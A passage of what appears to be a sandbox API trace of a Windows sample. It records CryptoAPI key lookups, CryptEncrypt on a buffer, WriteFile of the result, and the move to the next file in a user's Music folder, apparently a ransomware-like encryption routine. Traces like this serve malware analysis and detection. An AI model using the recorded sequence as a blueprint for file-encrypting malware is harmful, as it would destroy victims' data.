hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0111.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0111.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0111.558] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0111.558] CryptGetKeyParam (in: hKey=0x41ac000, dwParam=0x7, pbData=0x43e28f0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e28f0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0111.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.560] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0111.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0111.561] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0111.561] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0111.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.563] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.563] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.563] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0111.563] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0111.563] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0111.563] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0111.563] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.563] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0111.563] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.564] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0111.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca9a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0111.564] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x1eef, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x1ef0) returned 1 [0111.564] CharLowerBuffW (in: lpsz="byte[7921]", cchLength=0xa | out: lpsz="byte[7921]") returned 0xa [0111.564] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.564] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0111.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caaa8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0111.564] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4519e00*, pdwDataLen=0x144e538*=0x1eef, dwBufLen=0x1ef0 | out: pbData=0x4519e00*, pdwDataLen=0x144e538*=0x1ef0) returned 1 [0111.564] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.564] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.564] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.564] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x1ef0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0x1ef0, lpOverlapped=0x0) returned 1 [0111.566] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0111.566] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.566] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0111.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca940, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0111.566] CryptDestroyKey (hKey=0x41ac000) returned 1 [0111.566] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.566] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.566] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.566] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.566] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.566] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.566] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.566] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0111.566] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0111.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0111.566] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0111.566] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.566] FreeLibrary (hLibModule=0x756e0000) returned 1 [0111.567] CloseHandle (hObject=0x258) returned 1 [0111.567] CloseHandle (hObject=0x298) returned 1 [0111.568] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\7eNkYBcGM pJGAedeLc.mp3", nBufferLength=0x7fff, 